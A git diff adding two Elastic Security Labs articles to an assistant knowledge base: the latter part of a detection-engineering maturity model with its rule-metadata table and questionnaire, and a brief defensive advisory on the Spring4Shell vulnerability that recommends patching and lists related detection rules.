+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No engagements with product owners.
+    * Repeatable: 1-2 engagements/requests completed per quarter; less than 20% of requests result in roadmap changes.
+    * Defined: More than two engagements/requests per quarter, resulting in roadmap changes and improvements in the detection ruleset; 50-70% of requests result in roadmap changes; regular tracking and documentation of engagement outcomes.
+    * Managed: Frequent engagements with product owners leading to more than 70% of requests resulting in roadmap changes; structured tracking and documentation of all engagements and outcomes.
+    * Optimized: Continuous engagement with product owners with real-time tracking and adjustments; 90-100% of requests lead to roadmap changes; comprehensive documentation and proactive feedback loops.
+
+###### End-to-End Release Testing and Validation
+
+Implementing a robust end-to-end release testing and validation process to ensure the reliability and effectiveness of detection rules before pushing them to production. This includes running different tests to catch potential issues and ensure rule accuracy.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No formal testing or validation process.
+    * Repeatable: Basic testing with minimal validation.
+    * Defined: Comprehensive testing with internal validation processes and multiple gates.
+    * Managed: Advanced testing with automated and external validation processes.
+    * Optimized: Continuous, automated testing and validation with real-time feedback and improvement mechanisms.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No testing or validation activities.
+    * Repeatable: 1-2 ruleset updates per release cycle (release cadence should be driven internally based on resources and internally mandated processes); less than 20% of rules tested before deployment.
+    * Defined: Time to end-to-end test and release a new rule or tuning from development to production is less than one week; 50-70% of rules are tested before deployment with documented validation.
+    * Managed: Ability to deploy an emerging threat rule within 24 hours; 90-100% of rules tested before deployment using automated and external validation processes; continuous improvement based on test outcomes.
+    * Optimized: Real-time testing and validation with automated deployment processes; 100% of rules tested and validated continuously; proactive improvement mechanisms based on real-time feedback and intelligence.
+
+#### Tier 2: Intermediate
+
+At the intermediate tier, teams continuously tune detection rules to reduce false positives and stale rules. They identify and document gaps in ruleset coverage, testing and validating rules internally with emulation tools and malware detonations to ensure proper alerting. Systematic gap analysis and regular communication with stakeholders are emphasized.
+
+![DEBMM - Tier 2](/assets/images/elastic-releases-debmm/image3.png "DEBMM - Tier 2")
+
+##### Criteria
+
+###### Continuously Tuning and Reducing False Positives (FP)
+
+Regularly reviewing and adjusting rules to minimize false positives and stale rules. Establish shared/scalable exception lists when necessary to prevent repetitive adjustments and document past FP analysis to avoid recurring issues.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: Minimal tuning activities.
+    * Repeatable: Reactive tuning based on alerts and ad hoc analyst feedback.
+    * Defined: Proactive and systematic tuning, with documented reductions in FP rates and documented/known data sources, leveraged to reduce FPs.
+    * Managed: Continuously tuned activities with detailed documentation and regular stakeholder communication; implemented systematic reviews and updates.
+    * Optimized: Automated and dynamic tuning processes integrated with advanced analytics and machine learning to continuously reduce FPs and adapt to new patterns.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No reduction in FP rate (when necessary) based on the overall volume of FP alerts reduced.
+    * Repeatable: 10-25% reduction in FP rate over the last quarter.
+    * Defined: More than a 25% reduction in FP rate over the last quarter, with metrics varying (rate determined by ruleset feature owner) between SIEM and endpoint rules based on the threat landscape.
+    * Managed: Consistent reduction in FP rate exceeding 50% over multiple quarters, with detailed metrics tracked and reported.
+    * Optimized: Near real-time reduction in FP rate with automated feedback loops and continuous improvement, achieving over 75% reduction in FP rate.
+
+###### Understanding and Documenting Gaps
+
+Identifying gaps in ruleset or product coverage is essential for improving data visibility and detection capabilities. This includes documenting missing fields, logging datasets, and understanding outliers in the data. Communicating these gaps with stakeholders and addressing them as "blockers" helps ensure continuous improvement. By understanding outliers, teams can identify unexpected patterns or anomalies that may indicate undetected threats or issues with the current ruleset.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No gap analysis.
+    * Repeatable: Occasional gap analysis with some documentation.
+    * Defined: Comprehensive and regular gap analysis with detailed documentation and stakeholder communication, including identifying outliers in the data.
+    * Managed: Systematic gap analysis integrated into regular workflows, with comprehensive documentation and proactive communication with stakeholders.
+    * Optimized: Automated gap analysis using advanced analytics and machine learning, with real-time documentation and proactive stakeholder engagement to address gaps immediately.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No gaps documented.
+    * Repeatable: 1-3 gaps in threat coverage (e.g., specific techniques like reverse shells, code injection, brute force attacks) documented and communicated.
+    * Defined: More than three gaps in threat coverage or data visibility documented and communicated, including gaps that block rule creation (e.g., lack of agent/logs) and outliers identified in the data.
+    * Managed: Detailed documentation and communication of all identified gaps, with regular updates and action plans to address them; over five gaps documented and communicated regularly.
+    * Optimized: Continuous real-time gap analysis with automated documentation and communication; proactive measures in place to address gaps immediately; comprehensive tracking and reporting of all identified gaps.
+
+###### Testing and Validation (Internal)
+
+Performing activities like executing emulation tools, C2 frameworks, detonating malware, or other repeatable techniques to test rule functionality and ensure proper alerting.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No testing or validation.
+    * Repeatable: Occasional testing with emulation capabilities.
+    * Defined: Regular and comprehensive testing with malware or emulation capabilities, ensuring all rules in production are validated.
+    * Managed: Systematic testing and validation processes integrated into regular workflows, with detailed documentation and continuous improvement.
+    * Optimized: Automated and continuous testing and validation with advanced analytics and machine learning, ensuring real-time validation and improvement of all rules.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No internal tests were conducted.
+    * Repeatable: 40% emulation coverage of production ruleset.
+    * Defined: 80% automated testing coverage of production ruleset.
+    * Managed: Over 90% automated testing coverage of production ruleset with continuous validation processes.
+    * Optimized: 100% automated and continuous testing coverage with real-time validation and feedback loops, ensuring optimal rule performance and accuracy.
+
+#### Tier 3: Advanced
+
+Advanced maturity involves systematically identifying and addressing false negatives, validating detection rules externally, and covering advanced TTPs (Tactics, Techniques, and Procedures). This tier emphasizes comprehensive and continuous improvement through external assessments and coverage of sophisticated threats.
+
+![DEBMM - Tier 3](/assets/images/elastic-releases-debmm/image9.png "DEBMM - Tier 3")
+
+##### Criteria
+
+###### Triaging False Negatives (FN)
+
+Triaging False Negatives (FN) involves systematically identifying and addressing instances where the detection rules fail to trigger alerts for actual threats, referred to as false negatives. False negatives occur when a threat is present in the dataset but is not detected by the existing rules, potentially leaving the organization vulnerable to undetected attacks. Leveraging threat landscape insights, this process documents and assesses false negatives within respective environments, aiming for a threshold of true positives in the dataset using the quantitative criteria.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No triage of false negatives.
+    * Repeatable: Sporadic triage with some improvements.
+    * Defined: Systematic and regular triage with documented reductions in FNs and comprehensive FN assessments in different threat landscapes.
+    * Managed: Proactive triage activities with detailed documentation and stakeholder communication; regular updates to address FNs.
+    * Optimized: Continuous, automated triage and reduction of FNs using advanced analytics and machine learning; real-time documentation and updates.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No reduction in FN rate.
+    * Repeatable: 50% of the tested samples or tools used to trigger an alert; less than 10% of rules are reviewed for FNs quarterly; minimal documentation of FN assessments.
+    * Defined: 70-90% of the tested samples trigger an alert, with metrics varying based on the threat landscape and detection capabilities; 30-50% reduction in FNs over the past year; comprehensive documentation and review of FNs for at least 50% of the rules quarterly; regular feedback loops established with threat intelligence teams.
+    * Managed: 90-100% of tested samples trigger an alert, with consistent FN reduction metrics tracked; over 50% reduction in FNs over multiple quarters; comprehensive documentation and feedback loops for all rules.
+    * Optimized: Near real-time FN triage with automated feedback and updates; over 75% reduction in FNs; continuous documentation and proactive measures to address FNs.
+
+###### External Validation
+
+External Validation involves engaging third parties to validate detection rules through various methods, including red team exercises, third-party assessments, penetration testing, and collaboration with external threat intelligence providers. By incorporating diverse perspectives and expertise, this process ensures that the detection rules are robust, comprehensive, and effective against real-world threats.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No external validation.
+    * Repeatable: Occasional external validation efforts with some improvements.
+    * Defined: Regular and comprehensive external validation with documented feedback, improvements, and integration of findings into the detection ruleset. This level includes all of these validation methods.
+    * Managed: Structured external validation activities with detailed documentation and continuous improvement; proactive engagement with multiple third-party validators.
+    * Optimized: Continuous external validation with automated feedback integration, real-time updates, and proactive improvements based on diverse third-party insights.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No external validation was conducted.
+    * Repeatable: 1 external validation exercise per year, such as a red team exercise or third-party assessment; less than 20% of identified gaps are addressed annually.
+    * Defined: More than one external validation exercise per year, including a mix of methods such as red team exercises, third-party assessments, penetration testing, and collaboration with external threat intelligence providers; detailed documentation of improvements based on external feedback, with at least 80% of identified gaps addressed within a quarter; integration of external validation findings into at least 50% of new rules.
+    * Managed: Multiple external validation exercises per year, with comprehensive feedback integration; over 90% of identified gaps addressed within set timelines; proactive updates to rules based on continuous external insights.
+    * Optimized: Continuous, real-time external validation with automated feedback and updates; 100% of identified gaps addressed proactively; comprehensive tracking and reporting of all external validation outcomes.
+
+###### Advanced TTP Coverage
+
+Covering non-commodity malware (APTs, zero-days, etc.) and emerging threats (new malware families and offensive security tools abused by threat actors, etc.) in the ruleset. This coverage is influenced by the capability of detecting these advanced threats, which requires comprehensive telemetry and flexible data ingestion. While demonstrating these behaviors early in the maturity process can have a compounding positive effect on team growth, this criterion is designed to focus on higher fidelity rulesets with low FPs.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No advanced TTP coverage.
+    * Repeatable: Response to some advanced TTPs based on third-party published research.
+    * Defined: First-party coverage created for advanced TTPs based on threat intelligence and internal research, with flexible and comprehensive data ingestion capabilities.
+    * Managed: Proactive coverage for advanced TTPs with detailed threat intelligence and continuous updates; integration with diverse data sources for comprehensive detection.
+    * Optimized: Continuous, automated coverage for advanced TTPs using advanced analytics and machine learning; real-time updates and proactive measures for emerging threats.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No advanced TTP coverage.
+    * Repeatable: Detection and response to 1-3 advanced TTPs/adversaries based on available data and third-party research; less than 20% of rules cover advanced TTPs.
+    * Defined: Detection and response to more than three advanced TTPs/adversaries uniquely identified and targeted based on first-party threat intelligence and internal research; 50-70% of rules cover advanced TTPs; comprehensive telemetry and flexible data ingestion for at least 70% of advanced threat detections; regular updates to advanced TTP coverage based on new threat intelligence.
+    * Managed: Detection and response to over five advanced TTPs/adversaries with continuous updates and proactive measures; 70-90% of rules cover advanced TTPs with integrated telemetry and data ingestion; regular updates and feedback loops with threat intelligence teams.
+    * Optimized: Real-time detection and response to advanced TTPs with automated updates and proactive coverage; 100% of rules cover advanced TTPs with continuous telemetry integration; dynamic updates and real-time feedback based on evolving threat landscapes.
+
+#### Tier 4: Expert
+
+The expert tier focuses on advanced automation, seamless integration with other security tools, and continuous improvement through regular updates and external collaboration. While proactive threat hunting is essential for maintaining a solid security posture, it complements the ruleset management process by identifying new patterns and insights that can be incorporated into detection rules. Teams implement sophisticated automation for rule updates, ensuring continuous integration of advanced detections. At Elastic, our team is constantly refining our rulesets through daily triage, regular updates, and sharing [threat hunt queries](https://github.com/elastic/detection-rules/tree/main/hunting) in our public GitHub repository to help the community improve their detection capabilities. 
+
+![DEBMM - Tier 4](/assets/images/elastic-releases-debmm/image7.png "DEBMM - Tier 4")
+
+##### Criteria
+
+###### Hunting in Telemetry/Internal Data
+
+Setting up queries and daily triage to hunt for new threats and ensure rule effectiveness. This applies to vendors hunting in telemetry and other teams hunting in their available datasets.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No hunting activities leading to ruleset improvement.
+    * Repeatable: Occasional hunting activities with some findings.
+    * Defined: Regular and systematic hunting with significant coverage findings based on the Threat Hunting Maturity Model, including findings from external validation, end-to-end testing, and malware detonations.
+    * Managed: Continuous hunting activities with comprehensive documentation and integration of findings; regular feedback loops between hunting and detection engineering teams.
+    * Optimized: Automated, real-time hunting with advanced analytics and machine learning; continuous documentation and proactive integration of findings to enhance detection rules.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No hunting activities conducted, leading to ruleset improvement.
+    * Repeatable: Bi-weekly outcome (e.g., discovered threats, new detections based on hypotheses, etc.) from hunting workflows; less than 20% of hunting findings are documented; minimal integration of hunting results into detection rules.
+    * Defined: Weekly outcome with documented improvements and integration into detection rules based on hunting results and external validation data; 50-70% of hunting findings are documented and integrated into detection rules; regular feedback loop established between hunting and detection engineering teams.
+    * Managed: Daily hunting activities with comprehensive documentation and integration of findings; over 90% of hunting findings are documented and lead to updates in detection rules; continuous improvement processes based on hunting results and external validation data; regular collaboration with threat intelligence teams to enhance hunting effectiveness.
+    * Optimized: Real-time hunting activities with automated documentation and integration; 100% of hunting findings are documented and lead to immediate updates in detection rules; continuous improvement with proactive measures based on advanced analytics and threat intelligence.
+
+###### Continuous Improvement and Potential Enhancements
+
+Continuous improvement is vital at the expert tier, leveraging the latest technologies and methodologies to enhance detection capabilities. The "Optimized" levels in the different criteria across various tiers emphasize the necessity for advanced automation and the integration of emerging technologies. Implementing automation for rule updates, telemetry filtering, and integration with other advanced tools is essential for modern detection engineering. While current practices involve advanced automation beyond basic case management and SOAR (Security Orchestration, Automation, and Response), there is potential for further enhancements using emerging technologies like generative AI and large language models (LLMs). This reinforces the need for continuous adaptation and innovation at the highest tier to maintain a robust and effective security posture.
+
+* Qualitative Behaviors - State of Ruleset:
+    * Initial: No automation.
+    * Repeatable: Basic automation for rule management processes, such as ETL (Extract, transform, and load) data plumbing to enable actionable insights.
+    * Defined: Initial use of generative AI to assist in rule creation and assessment. For example, AI can assess the quality of rules based on predefined criteria.
+    * Managed: Advanced use of AI/LLMs to detect rule duplications and overlaps, suggesting enhancements rather than creating redundant rules.
+    * Optimized: Full generative AI/LLMs integration throughout the detection engineering lifecycle. This includes using AI to continuously improve rule accuracy, reduce false positives, and provide insights on rule effectiveness.
+* Quantitative Measurements - Activities to Maintain State:
+    * Initial: No automated processes implemented.
+    * Repeatable: Implement basic automated processes for rule management and integration; less than 30% of rule management tasks are automated; initial setup of automated deployment and version control.
+    * Defined: Use of AI to assess rule quality, with at least 80% of new rules undergoing automated quality checks before deployment; 40-60% of rule management tasks are automated; initial AI-driven insights are used to enhance rule effectiveness and reduce false positives.
+    * Managed: AI-driven duplication detection, with a target of reducing rule duplication by 50% within the first year of implementation; 70-80% of rule management tasks are automated; AI-driven suggestions result in a 30-50% reduction in FPs; continuous integration pipeline capturing and deploying rule updates.
+    * Optimized: Comprehensive AI integration, where over 90% of rule updates and optimizations are suggested by AI, leading to a significant decrease in manual triaging of alerts and a 40% reduction in FPs; fully automated rule management and deployment processes; real-time AI-driven telemetry filtering and integration with other advanced tools.
+
+### Applying the DEBMM to Understand Maturity
+
+Once you understand the DEBMM and its tiers, you can begin applying it to assess and enhance your detection engineering maturity.
+
+![Maturity Progression](/assets/images/elastic-releases-debmm/image4.png "Maturity Progression")
+
+The following steps will guide you through the process:
+
+**1. Audit Your Current Maturity Tier**: Evaluate your existing detection rulesets against the criteria outlined in the DEBMM. Identify your rulesets' strengths, weaknesses, and most significant risks to help determine your current maturity tier. For more details, see the [Example Questionnaire](#Example-Questionnaire).
+
+**2. Understand the Scope of Effort: **Recognize the significant and sustained effort required to move from one tier to the next. As teams progress through the tiers, the complexity and depth of activities increase, requiring more resources, advanced skills, and comprehensive strategies. For example, transitioning from Tier 1 to Tier 2 involves systematic rule tuning and detailed gap analysis, while advancing to Tier 3 and Tier 4 requires robust external validation processes, proactive threat hunting, and sophisticated automation.
+
+**3. Set Goals for Progression: **Define specific goals for advancing to the next tier. Use the qualitative and quantitative measures to set clear objectives for each criterion. 
+
+**4. Develop a Roadmap:** Create a detailed plan outlining the actions needed to achieve the goals. Include timelines, resources, and responsible team members. Ensure foundational practices from lower tiers are consistently applied as you progress while identifying opportunities for quick wins or significant impact by first addressing the most critical and riskiest areas for improvement.
+
+![](/assets/images/elastic-releases-debmm/image7.png)
+
+**5. Implement Changes:** Execute the plan, ensuring all team members are aligned with the objectives and understand their roles. Review and adjust the plan regularly as needed.
+
+**6. Monitor and Measure Progress:** Continuously track and measure the performance of your detection rulesets against the DEBMM criteria. Use metrics and key performance indicators (KPIs) to monitor your progress and identify areas for further improvement.
+
+**7. Iterate and Improve:** Regularly review and update your improvement plan based on feedback, results, and changing threat landscapes. Iterate on your detection rulesets to enhance their effectiveness and maintain a high maturity tier.
+
+#### Grouping Criteria for Targeted Improvement
+
+To further simplify the process, you can group criteria into specific categories to focus on targeted improvements. For example:
+
+* **Rule Creation and Management:** Includes criteria for creating, managing, and maintaining rules.
+* **Telemetry and Data Quality:** Focuses on improving and maintaining telemetry quality.
+* **Threat Landscape Review:** Involves regularly reviewing and updating rules based on changes in the threat landscape.
+* **Stakeholder Engagement:** Engaging with product owners and other stakeholders to meet detection needs.
+
+Grouping criteria allow you to prioritize activities and improvements based on your current needs and goals. This structured and focused approach helps enhance your detection rulesets and is especially beneficial for teams with multiple feature owners working in different domains toward a common goal.
+
+## Conclusion
+
+Whether you apply the DEBMM to your ruleset or use it as a guide to enhance your detection capabilities, the goal is to help you systematically develop, manage, and improve your detection rulesets. By following this structured model and progressing through the maturity tiers, you can significantly enhance the effectiveness of your threat detection capabilities. Remember, security is a continuous journey; consistent improvement is essential to stay ahead of emerging threats and maintain a robust security posture. The DEBMM will support you in achieving better security and more effective threat detection. We value your feedback and suggestions on refining and enhancing the model to benefit the security community. Please feel free to reach out with your thoughts and ideas.
+
+We’re always interested in hearing use cases and workflows like these, so as always, reach out to us via [GitHub issues](https://github.com/elastic/protections-artifacts/issues), chat with us in our [community Slack](http://ela.st/slack), and ask questions in our [Discuss forums](https://discuss.elastic.co/c/security/endpoint-security/80)!
+
+## Appendix
+
+### Example Rule Metadata 
+
+Below is an updated list of criteria that align with example metadata used within Elastic but should be tailored to the product used:
+
+|        Field        |                                                                                                                                                                              Criteria                                                                                                                                                                              |
+|:-------------------:|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|
+| name                | Should be descriptive, concise, and free of typos related to the rule. Clearly state the action or behavior being detected. Validation can include spell-checking and ensuring it adheres to naming conventions.                                                                                                                                                   |
+| author              | Should attribute the author or organization who developed the rule.                                                                                                                                                                                                                                                                                                |
+| description         | Detailed explanation of what the rule detects, including the context and significance. Should be free of jargon and easily understandable. Validation can ensure the length and readability of the text.                                                                                                                                                           |
+| from                | Defines the time range the rule should look back from the current time. Should be appropriate for the type of detection and the expected data retention period. Validation can check if the time range is within acceptable limits.                                                                                                                                |
+| index               | Specifies the data indices to be queried. Should accurately reflect where relevant data is stored. Validation can ensure indices exist and are correctly formatted.                                                                                                                                                                                                |
+| language            | Indicates the query language used (e.g., EQL, KQL, Lucene). Should be appropriate for the type of query and the data source if multiple languages are available. Validation can confirm the language is supported and matches the query format.                                                                                                                    |
+| license             | Indicates the license under which the rule is provided. Should be clear and comply with legal requirements. Validation can check against a list of approved licenses.                                                                                                                                                                                              |
+| rule_id             | Unique identifier for the rule. Should be a UUID to ensure uniqueness. Validation can ensure the rule_id follows UUID format.                                                                                                                                                                                                                                      |
+| risk_score          | Numerical value representing the severity or impact of the detected behavior. Should be based on a standardized scoring system. Validation can check the score against a defined range.                                                                                                                                                                            |
+| severity            | Descriptive level of the rule's severity (e.g., low, medium, high). Should align with the risk score and organizational severity definitions. Validation can ensure consistency between risk score and severity.                                                                                                                                                   |
+| tags                | List of tags categorizing the rule. Should include relevant domains, operating systems, use cases, tactics, and data sources. Validation can check for the presence of required tags and their format.                                                                                                                                                             |
+| type                | Specifies the type of rule (e.g., eql, query). Should match the query language and detection method. Validation can ensure the type is correctly specified.                                                                                                                                                                                                        |
+| query               | The query logic used to detect the behavior. Should be efficient, accurate, and tested for performance with fields validated against a schema. Validation can include syntax checking and performance testing.                                                                                                                                                     |
+| references          | List of URLs or documents that provide additional context or background information. Should be relevant and authoritative. Validation can ensure URLs are accessible and from trusted sources.                                                                                                                                                                     |
+| setup               | Instructions for setting up the rule. Should be clear, comprehensive, and easy to follow. Validation can check for completeness and clarity.                                                                                                                                                                                                                       |
+| creation_date       | Date when the rule was created. Should be in a standardized format. Validation can ensure the date is in the correct format.                                                                                                                                                                                                                                       |
+| updated_date        | Date when the rule was last updated. Should be in a standardized format. Validation can ensure the date is in the correct format.                                                                                                                                                                                                                                  |
+| integration         | List of integrations that the rule supports. Should be accurate and reflect all relevant integrations. Validation can ensure integrations are correctly listed.                                                                                                                                                                                                    |
+| maturity            | Indicates the maturity level of the rule (e.g., experimental, beta, production). Should reflect the stability and reliability of the rule. Validation can check against a list of accepted maturity levels. Note: While this field is not explicitly used in Kibana, it’s beneficial to track rules with different maturities in the format stored locally in VCS. |
+| threat              | List of MITRE ATT&CK tactics, techniques, and subtechniques related to the rule. Should be accurate and provide relevant context. Validation can check for correct mapping to MITRE ATT&CK.                                                                                                                                                                        |
+| actions             | List of actions to be taken when the rule is triggered. Should be clear and actionable. Validation can ensure actions are feasible and clearly defined.                                                                                                                                                                                                            |
+| building_block_type | Type of building block rule if applicable. Should be specified if the rule is meant to be a component of other rules. Validation can ensure this field is used appropriately.                                                                                                                                                                                      |
+| enabled             | Whether the rule is currently enabled or disabled. Validation can ensure this field is correctly set.                                                                                                                                                                                                                                                              |
+| exceptions_list     | List of exceptions to the rule. Should be comprehensive and relevant. Validation can check for completeness and relevance.                                                                                                                                                                                                                                         |
+| version             | Indicates the version of the rule (int, semantic version, etc) to track changes. Validation can ensure the version follows a consistent format.                                                                                                                                                                                                                    |
+
+### Example Questionnaire
+
+#### 1. Identify Threat Landscape
+
+**Questions to Ask:**
+
+* Do you regularly review the top 5 threats your organization faces? (Yes/No)
+* Are relevant tactics and techniques identified for these threats? (Yes/No)
+* Is the threat landscape reviewed and updated regularly? (Yes - Monthly/Yes - Quarterly/Yes - Annually/No)
+* Have any emerging threats been recently identified? (Yes/No)
+* Is there a designated person responsible for monitoring the threat landscape? (Yes/No)
+* Do you have data sources that capture relevant threat traffic? (Yes/Partial/No)
+* Are critical assets likely to be affected by these threats identified? (Yes/No)
+* Are important assets and their locations documented? (Yes/No)
+* Are endpoints, APIs, IAM, network traffic, etc. in these locations identified? (Yes/Partial/No)
+* Are critical business operations identified and their maintenance ensured? (Yes/No)
+* If in healthcare, are records stored in a HIPAA-compliant manner? (Yes/No)
+* If using cloud, is access to cloud storage locked down across multiple regions? (Yes/No)
+
+**Steps for Improvement:**
+
+* Establish a regular review cycle for threat landscape updates.
+* Engage with external threat intelligence providers for broader insights.
+
+#### 2. Define the Perfect Rule
+
+**Questions to Ask:**
+
+* Are required fields for a complete rule defined? (Yes/No)
+* Is there a process for documenting and validating rules? (Yes/No)
+* Is there a clear process for creating new rules? (Yes/No)
+* Are rules prioritized for creation and updates based on defined criteria? (Yes/No)
+* Are templates or guidelines available for rule creation? (Yes/No)
+* Are rules validated for a period before going into production? (Yes/No)
+
+**Steps for Improvement:**
+
+* Develop and standardize templates for rule creation.
+* Implement a review process for rule validation before deployment.
+
+#### 3. Define the Perfect Ruleset
+
+**Questions to Ask:**
+
+* Do you have baseline rules needed to cover key threats? (Yes/No)
+* Are major threat techniques covered by your ruleset? (Yes/Partial/No)
+* Is the effectiveness of the ruleset measured? (Yes - Comprehensively/Yes - Partially/No)
+* Do you have specific criteria used to determine if a rule should be included in the ruleset? (Yes/No)
+* Is the ruleset maintained and updated? (Yes - Programmatic Maintenance & Frequent Updates/Yes - Programmatic Maintenance & Ad hoc Updates/Yes - Manual Maintenance & Frequent Updates/Yes - Manual Maintenance & Ad Hoc Updates/No)
+
+**Steps for Improvement:**
+
+* Perform gap analysis to identify missing coverage areas.
+* Regularly update the ruleset based on new threat intelligence and feedback.
+
+#### 4. Maintain
+
+**Questions to Ask:**
+
+* Are rules reviewed and updated regularly? (Yes - Monthly/Yes - Quarterly/Yes - Annually/No)
+* Is there a version control system in place? (Yes/No)
+* Are there documented processes for rule maintenance? (Yes/No)
+* How are changes to the ruleset communicated to stakeholders? (Regular Meetings/Emails/Documentation/No Communication)
+* Are there automated processes for rule updates and validation? (Yes/Partial/No)
+
+**Steps for Improvement:**
+
+* Implement version control for all rules.
+* Establish automated workflows for rule updates and validation.
+
+#### 5. Test & Release
+
+**Questions to Ask:**
+
+* Are tests performed before rule deployment? (Yes/No)
+* Is there a documented validation process? (Yes/No)
+* Are test results documented and used to improve rules? (Yes/No)
+* Is there a designated person responsible for testing and releasing rules? (Yes/No)
+* Are there automated testing frameworks in place? (Yes/Partial/No)
+
+**Steps for Improvement:**
+
+* Develop and maintain a testing framework for rule validation.
+* Document and review test results to continuously improve rule quality.
+
+#### 6. Criteria Assessment
+
+**Questions to Ask:**
+
+* Are automated tools, including generative AI, used in the rule assessment process? (Yes/No)
+* How often are automated assessments conducted using defined criteria? (Monthly/Quarterly/Annually/Never)
+* What types of automation or AI tools are integrated into the rule assessment process? (List specific tools)
+* How are automated insights, including those from generative AI, used to optimize rules? (Regular Updates/Ad hoc Updates/Not Used)
+* What metrics are tracked to measure the effectiveness of automated assessments? (List specific metrics)
+
+**Steps for Improvement:**
+
+* Integrate automated tools, including generative AI, into the rule assessment and optimization process.
+* Regularly review and implement insights from automated assessments to enhance rule quality.
+
+#### 7. Iterate
+
+**Questions to Ask:**
+
+* How frequently is the assessment process revisited? (Monthly/Quarterly/Annually/Never)
+* What improvements have been identified and implemented from previous assessments? (List specific improvements)
+* How is feedback from assessments incorporated into the ruleset? (Regular Updates/Ad hoc Updates/Not Used)
+* Who is responsible for iterating on the ruleset based on assessment feedback? (Designated Role/No Specific Role)
+* Are there metrics to track progress and improvements over time? (Yes/No)
+
+**Steps for Improvement:**
+
+* Establish a regular review and iteration cycle.
+* Track and document improvements and their impact on rule effectiveness.
+
+_The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all._
\ No newline at end of file
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_response_to_the_the_spring4shell_vulnerability_cve_2022_22965.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_response_to_the_the_spring4shell_vulnerability_cve_2022_22965.md
new file mode 100644
index 0000000000000..49a76e50a77f8
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/elastic_response_to_the_the_spring4shell_vulnerability_cve_2022_22965.md
@@ -0,0 +1,54 @@
+---
+title: "Elastic's response to the Spring4Shell vulnerability (CVE-2022-22965)"
+slug: "elastic-response-to-the-the-spring4shell-vulnerability-cve-2022-22965"
+date: "2022-11-22"
+description: "Provide executive-level details about CVE-2022-22965, a recently-disclosed remote code execution (RCE) vulnerability also known as “Spring4Shell”."
+author:
+  - slug: devon-kerr
+image: "thumbnail-security-logos-lock.png"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+---
+
+On March 29, 2022 a vulnerability in the [Spring framework](https://spring.io/projects/spring-framework) was [disclosed](https://tanzu.vmware.com/security/cve-2022-22965) to the public by VMware. This vulnerability had several prerequisites affecting impact:
+
+- Spring framework versions 5.3.0-5.3.17, 5.2.0-5.2.19, potentially software versions prior to 5.2.x
+- An application running as a Spring MVX or WebFlux object
+- Apache Tomcat as the container for that application
+- The application packaged as a Web Application Resource (WAR)
+
+Specifically, this vulnerability targets the ClassLoader() class, though similar undiscovered vulnerabilities in other classes are likely. A URI parameter can be passed to Tomcat as part of a standard web request to exploit this vulnerability.
+
+## What is the threat?
+
+CVE-2022-22965 is a vulnerability that may affect systems on which the Spring Framework has been installed, and which expose Spring MVC or WebFlux applications running on JDK 9 or later. The exploit associated with this vulnerability requires Apache Tomcat, and that applications are deployed as Web Application Resources (WARs) — but enterprises should consider that other methods of exploitation are also possible.
+
+## What is the impact?
+
+If successfully exploited, the Spring4Shell vulnerability may permit an adversary to execute arbitrary code (including malware) in the context of the web server. Because specific software, versions, and configurations are required as prerequisites, enterprises should expect a less impact than a vulnerability like [Log4Shell](https://www.elastic.co/blog/analysis-of-log4shell-cve-2021-45046). While Spring4Shell has more specific prerequisites to cause impact, Elastic Security still recommends [following official guidance](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement) regarding patching and upgrading.
+
+## Leveraging Elastic for exploit detection
+
+Prebuilt protections that generically identify aspects of successful exploitation already exist in community-facing repositories:
+
+- [Webshell Detection: Script Process Child of Common Web Processes](https://github.com/elastic/detection-rules/blob/6bdfddac8edea5e327bf28aed7e6dc4a7f701dc6/rules/windows/persistence_webshell_detection.toml)
+- [Potential Shell via Web Server](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/linux/persistence_shell_activity_by_web_server.toml)
+
+Additionally, Elastic [provides](https://github.com/elastic/detection-rules) dozens of rules for common and uncommon post-exploitation techniques, which may appear in later stages of an intrusion attempt.
+
+### Artifacts
+
+Elastic’s community-facing [detection-rules repository](https://github.com/elastic/detection-rules) contains two rules specific to webserver post-exploitation. Due to the unpredictable nature of vulnerabilities, any post-exploitation rules provided by Elastic may be helpful in detecting or understanding a Spring4Shell-related intrusion attempt. For enterprises seeking to better understand this vulnerability, consider [this](https://sholzhauer.medium.com/spring4shell-detection-and-response-elastic-946ec4f59026) excellent overview by Elastic community member Stijn Holzhauer.
+
+## Defensive recommendations
+
+Enterprises should follow guidance provided by Spring in their [official disclosure announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement), and seek to patch or upgrade the Spring framework. Additionally, for those who may not be able to address the vulnerability in Spring, a patch has also been released to close this vulnerability in Apache Tomcat (minimum versions 10.0.20, 9.0.62, 8.5.78). Further, it is possible to configure disallowedFields to neutralize vulnerabilities related to data binding abuses.
+
+## References
+
+- [Spring Framework RCE, Early Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)
+- [CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+](https://tanzu.vmware.com/security/cve-2022-22965)
